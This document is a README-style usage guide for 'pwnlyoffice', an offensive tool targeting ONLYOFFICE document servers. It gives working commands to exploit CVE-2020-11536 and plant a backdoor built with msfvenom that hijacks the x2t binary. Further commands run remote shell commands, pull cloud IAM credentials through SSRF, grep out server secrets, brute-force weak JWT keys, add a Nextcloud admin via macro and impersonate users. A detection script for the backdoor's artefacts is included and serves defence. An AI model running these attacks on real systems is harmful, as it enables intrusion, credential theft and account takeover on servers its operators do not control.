Exploit ONLYOFFICE Implementations
`pwnlyoffice` has a number of sub-commands to carry out actions against vulnerable instances of ONLYOFFICE. The main ones are:
- dl: Connect to the ONLYOFFICE document server and request that it downloads a provided URL. This can be used to test an instance to see if it has an unauthenticated / weak websocket. A random document id is created, and this sub-command can be used to inject a malicious document into the document server (CVE-2020-11536).
- macro: If a pre-existing document id is known, this will inject the given JavaScript file into it as a macro. Two example exploits for Nextcloud are included in `/macros`, plus a basic PoC alert box.
- chat: If a pre-existing document id is known, this allows you to connect to the in-editor chat function and pretend to be any user id of your choice.
- backdoor: Generate a malicious document which exploits CVE-2020-11536 to write a backdoor on the server.
- shell: Run commands against a server which has been compromised with the backdoor.
- enum: Attempt to guess valid document ids by providing a file containing a list of potential ids. The script will try each one to find a valid pre-existing document.
```
./pwnlyoffice.py -u https://theonlyofficesiteurl -D https://yoursite/uniquepath dl
```
Any hits to `/uniquepath` mean that the server meets the conditions for being able to have a malicious document injected into it:
- The authentication is either absent or uses the default JWT signing key
- The server is able to reach out to the Internet
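The second condition above is the one worth confirming before going further. The script below is an added example (not part of pwnlyoffice): given a JWT captured from the document server's traffic, it tries a list of candidate signing secrets and reports which one validates the token, rejecting `alg: none` and tampered tokens along the way. The candidate list and the sample token are assumptions constructed for the example; substitute the documented default secret for the target version, and a real captured token, when using it.

```python
import base64
import hashlib
import hmac
import json

# Candidate secrets to try. This list is an assumption for the example;
# substitute the documented default for the target document server version.
CANDIDATE_SECRETS = ["secret", "onlyoffice", "documentserver", "changeme"]


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(payload: dict, secret: str) -> str:
    """Mint an HS256 JWT. Used here to build the constructed sample token."""
    header = {"alg": "HS256", "typ": "JWT"}
    parts = [b64url_encode(json.dumps(part, separators=(",", ":")).encode())
             for part in (header, payload)]
    signing_input = ".".join(parts)
    sig = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(sig)


def verify_hs256(token: str, secret: str) -> bool:
    """True only if the token is a well-formed HS256 JWT signed with `secret`.
    Any other alg (including "none") is rejected before the MAC is checked."""
    try:
        head_b64, body_b64, sig_b64 = token.split(".")
        header = json.loads(b64url_decode(head_b64))
        sig = b64url_decode(sig_b64)
    except ValueError:
        return False
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return False
    expected = hmac.new(secret.encode(), f"{head_b64}.{body_b64}".encode(),
                        hashlib.sha256).digest()
    return hmac.compare_digest(expected, sig)


def find_weak_secret(token: str, candidates):
    """Return the first candidate secret that validates the token, else None."""
    for candidate in candidates:
        if verify_hs256(token, candidate):
            return candidate
    return None


def decode_claims(token: str) -> dict:
    """Claims of a token (unverified; inspect only after find_weak_secret hits)."""
    return json.loads(b64url_decode(token.split(".")[1]))


# Constructed sample: a document-open style token signed with the weak secret
# "secret". The field names are illustrative, not the server's actual schema.
SAMPLE_TOKEN = sign_hs256(
    {"document": {"key": "1234", "url": "https://yoursite/backdoor.docx"}},
    "secret",
)

if __name__ == "__main__":
    hit = find_weak_secret(SAMPLE_TOKEN, CANDIDATE_SECRETS)
    print("weak secret:", hit)
    if hit:
        print("claims:", decode_claims(SAMPLE_TOKEN))
```

A hit means anyone can mint their own tokens for the server, which is what makes the `dl` and `macro` sub-commands work against an instance that nominally has JWT enabled; no hit against a real captured token means either the secret was rotated or a different signing algorithm is in use.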
```
./pwnlyoffice.py -u https://theonlyofficesiteurl backdoor
```
This generates `backdoor.docx`. Host this on a web server which is visible to the document server.

When loaded in ONLYOFFICE, this will write a number of files into `/var/www/onlyoffice/documentserver/server/FileConverter/bin` using CVE-2020-11536:
- `proxy.sh` - written to `x2t.sh`, and will proxy through any commands for `x2t` in order to provide arbitrary RCE.
- `hijack.so` - generated using `msfvenom -a x64 -p linux/x64/exec CMD="cp bin/x2t bin/x2t.new; mv bin/x2t.sh bin/x2t; chmod u+x bin/x2t" -f elf-so -o hijack.so`. This is written to the server as `libpthread.so` in order to be loaded higher up the `ld` search path and execute a command which switches out the legit `x2t` binary for the script which proxies it.
- `x2t` - this is the legit `x2t`, written to `x2t.old` so that, in case anything goes wrong, that file will be there to restore `x2t`.

Note that the `msfvenom` command above also copies the original binary to `x2t.new` before moving the proxy script into place, so a compromised install may carry both `x2t.old` and `x2t.new`.
To restore a borked server back to its pre-pwned state in case anything went wrong with this: `libpthread.so` should not be in `FileConverter/bin`, so delete it. `x2t` should be the legit `x2t` ELF binary and not a bash script, and there shouldn't be any `.sh` files in that folder.
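The restore checklist above doubles as a set of indicators for a defender or for verifying your own clean-up. The script below is an added example (not part of pwnlyoffice) that audits a `FileConverter/bin` directory for exactly those artefacts: an `x2t` that is no longer an ELF binary, a `libpthread.so` sitting in the directory, stray `.sh` files, and leftover `x2t.old`/`x2t.new` copies. The fixture directories it builds for a stand-alone run are constructed, and the placeholder script contents are not the real `proxy.sh`.

```python
import os
import tempfile

# Default location from the write-up; pass another path to audit a different install.
DEFAULT_BIN_DIR = "/var/www/onlyoffice/documentserver/server/FileConverter/bin"
ELF_MAGIC = b"\x7fELF"


def is_elf(path: str) -> bool:
    """True if the file starts with the ELF magic, so a script dropped over x2t fails."""
    try:
        with open(path, "rb") as fh:
            return fh.read(4) == ELF_MAGIC
    except OSError:
        return False


def audit_fileconverter_bin(bin_dir: str) -> list:
    """Return a list of findings; an empty list means none of the backdoor's
    artefacts described above are present in bin_dir."""
    findings = []
    x2t = os.path.join(bin_dir, "x2t")
    if not os.path.isfile(x2t):
        findings.append("x2t missing")
    elif not is_elf(x2t):
        findings.append("x2t is not an ELF binary (replaced by the proxy script?)")
    if os.path.lexists(os.path.join(bin_dir, "libpthread.so")):
        findings.append("libpthread.so present in bin dir (hijack library)")
    for name in sorted(os.listdir(bin_dir)):
        if name.endswith(".sh"):
            findings.append(f"shell script present: {name}")
        if name in ("x2t.old", "x2t.new"):
            findings.append(f"copy of the original x2t present: {name}")
    return findings


def build_sample_dirs():
    """Constructed fixtures: a clean bin dir and one carrying the artefacts.
    The script body is a placeholder, not the real proxy.sh."""
    fake_elf = ELF_MAGIC + b"\x02\x01\x01" + b"\x00" * 9

    clean = tempfile.mkdtemp(prefix="x2t-clean-")
    with open(os.path.join(clean, "x2t"), "wb") as fh:
        fh.write(fake_elf)

    pwned = tempfile.mkdtemp(prefix="x2t-pwned-")
    with open(os.path.join(pwned, "x2t.old"), "wb") as fh:
        fh.write(fake_elf)
    with open(os.path.join(pwned, "libpthread.so"), "wb") as fh:
        fh.write(fake_elf)
    for name in ("x2t", "x2t.sh"):
        with open(os.path.join(pwned, name), "w") as fh:
            fh.write("#!/bin/bash\n# placeholder, not the real proxy script\n")
    return clean, pwned


if __name__ == "__main__":
    # Audit the real install if present, otherwise demonstrate on the fixture.
    target = DEFAULT_BIN_DIR if os.path.isdir(DEFAULT_BIN_DIR) else build_sample_dirs()[1]
    for finding in audit_fileconverter_bin(target) or ["no backdoor artefacts found"]:
        print(f"{target}: {finding}")
```

Run it as root on the document server host (or point `audit_fileconverter_bin` at a mounted image); a clean install returns no findings. It only covers the artefacts this write-up names, so a variant that drops files elsewhere or names them differently will not be flagged.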
Load the hosted document into the server with `dl`, then run commands through the backdoor with `shell`:
```
./pwnlyoffice.py -u https://theonlyofficesiteurl -D https://yoursite/backdoor.docx dl
./pwnlyoffice.py -u https://theonlyofficesiteurl shell
```
Get the document cache folder location:
```
grep -A 2 storage /etc/onlyoffice/documentserver/*linux.json | grep folderPath
```
Get server secret strings (for example the JWT signing key):
```
grep -i secret /etc/onlyoffice/documentserver/*
```
Query the document server's database with the `sql` sub-command; `SELECT DISTINCT id FROM task_result` gives a list of valid document ids:
```
./pwnlyoffice.py -u https://theonlyofficesiteurl sql
```
The `dl` sub-command can also be used as an SSRF primitive, for example to have the document server request cloud instance metadata (here the AWS IAM credentials endpoint):
```
./pwnlyoffice.py -u https://theonlyofficesiteurl -D http://169.254.169.254/latest/meta-data/iam/security-credentials dl
```
This macro adds an admin user into Nextcloud. The document id is `1234` and has to be known by the attacker; these vary depending on what the underlying document management system is.
```
./pwnlyoffice.py -d 1234 -u https://theonlyofficesiteurl macro macros/nextcloud_addadmin.js
```
Masquerading as a user called "Bob", connected to document id "1234":
```
./pwnlyoffice.py -d 1234 -u https://theonlyofficesiteurl -U Bob chat
```